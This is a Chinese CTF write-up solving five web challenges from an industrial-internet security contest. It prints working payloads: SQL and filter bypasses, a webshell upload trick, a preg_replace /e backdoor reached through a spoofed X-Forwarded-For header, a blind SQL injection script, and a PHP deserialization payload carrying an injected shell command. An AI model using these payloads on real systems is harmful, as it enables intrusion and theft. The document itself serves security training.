XCTF-赛博地球杯工业互联网安全大赛web部分题解

快，关注这个公众号，一起涨姿势～

0x01工控云管理系统项目管理页面解析漏洞

题目首先给出了源码:

`http://47.104.156.32:20007/view-source.php`

关键代码如下：

第一层绕过

php

if (isset($_GET[id]) && floatval($_GET[id]) !== '1' && substr($_GET[id], -1) === '9') {

include 'config.php';

$id = mysql_real_escape_string($_GET[id]);

$sql="select * from cetc007.user where id='$id'";

$result = mysql_query($sql);

$result = mysql_fetch_object($result);

} else {

$result = False;

die();

}

if(!$result)die("

something wae wrong !

");

if($result){

echo "id: ".$result->id."";

echo "name:".$result->user."";

$_SESSION['admin'] = True;

}

?>

很显然我们需要绕过

if (isset($_GET[id]) && floatval($_GET[id]) !== '1' && substr($_GET[id], -1) === '9')

这里有3个需要注意的点:

`floatval($_GET[id]) !== '1'`的限制

`substr($_GET[id], -1) === '9')`的限制

mysql查询的结果限制,id大了查不到，例如29之类的

所以我们容易构造`id=1'--19`

即可轻松获得`$_SESSION['admin'] = True`

下面来到第二步关键过滤

if ($_SESSION['admin']) {

$con = $_POST['con'];

$file = $_POST['file'];

$filename = "backup/".$file;

if(preg_match('/.+\.ph(p[3457]?ttml)$/i', $filename)){

die("Bad file extension");

}else{

chdir('uploaded');

$f = fopen($filename, 'w');

fwrite($f, $con);

fclose($f);

}

}

?>

这里需要注意的3个点:

`$filename = "backup/".$file;`目录为假目录，需要绕过

`if(preg_match('/.+\.ph(p[3457]?ttml)$/i', $filename))`有一个正则对文件后缀进行过滤

真实的上传目录为:uploaded

所以我们这里针对第一个点容易想到，$file加一个../即可绕过这个假目录

针对第二个点，容易发现，匹配只匹配最后一个点的后缀，所以可以引用比较经典的解析问题`sky.php/.`绕过

第3个点，我们的真实目录

所以容易得到如下payload

post数据

con=&file=sky.php/.

使用菜刀连接即可拿到shell，flag就在`/var/www/html`目录下:`flag`

0x02 工控云管理系统设备维护中心被植入后门

题目给出连接

`http://47.104.74.209:20005/index.php?page=index`

一看到第一反应就是文件包含

随机读源码:

`http://47.104.74.209:20005/index.php?page=php://filter/read=convert.base64-encode/resource=index.php`

可以得到index.php的源码

关键代码:

if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {

echo "

Welcome My Admin !

";

$pattern = $_GET[pat];

$replacement = $_GET[rep];

$subject = $_GET[sub];

if (isset($pattern) && isset($replacement) && isset($subject)) {

preg_replace($pattern, $replacement, $subject);

}else{

die();

}

}

?>

很典型的`preg_replace`后门

给出参考链接:`http://www.jb51.net/article/38714.htm`

调用方法：

`preg_replace("/test/e",phpinfo(),"jutst test");`

所以下面构造payload，需要注意的是

`$_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1'`

我们需要改xff为127.0.0.1才能触发后门

payload：

pat=/test/e&rep=phpinfo()&sub=jutst%20test

所以下面我们只需要执行命令即可

先看一下当前目录

发现有可疑文件夹`s3chahahaDir`

继续深入文件夹查看`cd s3chahahaDir && ls`

发现`flag`文件夹

最终可以找到flag位置，并读取flag

`cat s3chahahaDir/flag/flag.php`

$flag = 'flag';

0x03 大量设备报表不见了（签道题）

纯脑洞题，卡了许久

看到url：`http://120.27.14.73:20006/index.php?id=1`

以为是注入，却发现只要不是数字都会302跳转，后来扫了5万目录字典……啥也没有

一气之下开始爆破id……竟然在

`http://120.27.14.73:20006/index.php?id=2333`

获得flag：flag

0x04 工控管理系统新版本

题目给了3个页面:

login.php

regist.php

findpwd.php

其中在findpwd.php中发现注入，并且竟然无任何过滤

所以这里就不详细介绍了，给出注入脚本

python

#!/usr/bin/env python

# encoding: utf-8

import requests

flag = ""

url = "http://47.104.1.173:20004/findpwd.php"

for i in range(1,1000):

for j in range(33,127):

data = {

#"username" :"admin' or ascii(substr((select SCHEMA_NAME from information_schema.SCHEMATA limit 3,1),%s,1))=%s#"%(i,j)

#"username": "admin' or ascii(substr((select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=0x63657463303034),%s,1))=%s#" % (i, j)

#"username": "admin' or ascii(substr((select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME=0x61646d696e limit 0,1),%s,1))=%s#" % (i, j)

"username": "admin' or ascii(substr((select username from `cetc004`.admin limit 0,1),%s,1))=%s#" % (i, j)

}

r = requests.post(url=url,data=data)

if "您的密保问题是cetc" in r.content:

flag += chr(j)

print flag

break

探测结果

库名

cetc004

表名

admin,user

admin表——字段

username,password,question,answer

username=c3tlwDmIn23

password=2f8667f381ff50ced6a3edc259260ba9

question=cetc

answer=cdwcewf2e3235y7687jnhbvdfcqsx12324r45y687o98kynbgfvds

然后只要注册一个同名用户，即可以管理员身份登录，获取flag:`flag`

0x05 工控系统的敏感消息遭泄漏

拿到题目`http://47.104.99.231:20003/index2.php`

扫了一下目录，发现.git泄露，随机拿到源码

关键代码如下：

index2.php

php

if(isset($ad)){

if(ereg("^[a-zA-Z0-9]+$", $ad) === FALSE)

{

echo '';

}

elseif(strpos($ad, '--') !== FALSE)

{

echo "Ok Evrything will be fine!

";

if (stripos($secret, './') > 0) {

die();

}

unserialize($secret);

}

else

{

echo '';

}

}

class.php

php

error_reporting(0);

class Record{

public $file="Welcome";

public function __construct($file)

{

$this->file = $file;

}

public function __sleep()

{

$this->file = 'sleep.txt';

return array('file');

}

public function __wakeup()

{

$this->file = 'wakeup.txt';

}

public function __destruct()

{

if ($this->file != 'wakeup.txt' && $this->file != 'sleep.txt' && $this->file != 'Welcome') {

system("php ./import/$this->file.php");

}

else{

echo "";

}

}

}

$b =new Record('Welcome');

unset($b);

?>

很明显的一个反序列化题目

首先是ad参数的绕过

php

if(ereg("^[a-zA-Z0-9]+$", $ad) === FALSE)

{

echo '';

}

elseif(strpos($ad, '--') !== FALSE)

{

……

}

这里比较容易，ereg()存在黑魔法，可以%00截断

所以得到:`http://47.104.99.231:20003/index2.php?ad=sky%00--`

然后是secret参数的序列化构造

我们首先尝试读取Flag.php文件

php

class Record{

public $file="Flag";

public function __construct($file)

{

$this->file = $file;

}

}

$file = "Flag";

$sky =new Record($file);

echo serialize($sky);

得到:`O:6:"Record":1:`

但这里显然这里是要求我们绕过wakeup()魔法函数

原因如下:

php

public function __destruct()

{

if ($this->file != 'wakeup.txt' && $this->file != 'sleep.txt' && $this->file != 'Welcome') {

system("php ./import/$this->file.php");

}

else{

echo "";

}

}

这里也是老生常谈的问题了，只要改变一下:

`O:6:"Record":10:`

即可

这时发现flag是在Flag.php的注释里，需要读源码

那么这里就必须绕过`system("php ./import/$this->file.php")`

这里比较容易，进行一个简单的拼接即可

php

error_reporting(0);

class Record{

public $file="Flag.php && echo `cat /var/www/html/import/Flag.php`";

public function __construct($file)

{

$this->file = $file;

}

}

$file = "Flag.php && echo `cat /var/www/html/import/Flag.php`";

$sky =new Record($file);

echo serialize($sky);

?>

然后即可获得flag

view-source:http://47.104.99.231:20003/index2.php?ad=sky%00--&secret=O%3a6%3a%22Record%22%3a10%3a%7bs%3a4%3a%22file%22%3bs%3a52%3a%22Flag%2ephp%20%26%26%20echo%20%60cat%20%2fvar%2fwww%2fhtml%2fimport%2fFlag%2ephp%60%22%3b%7d

得到:

Flag is !.php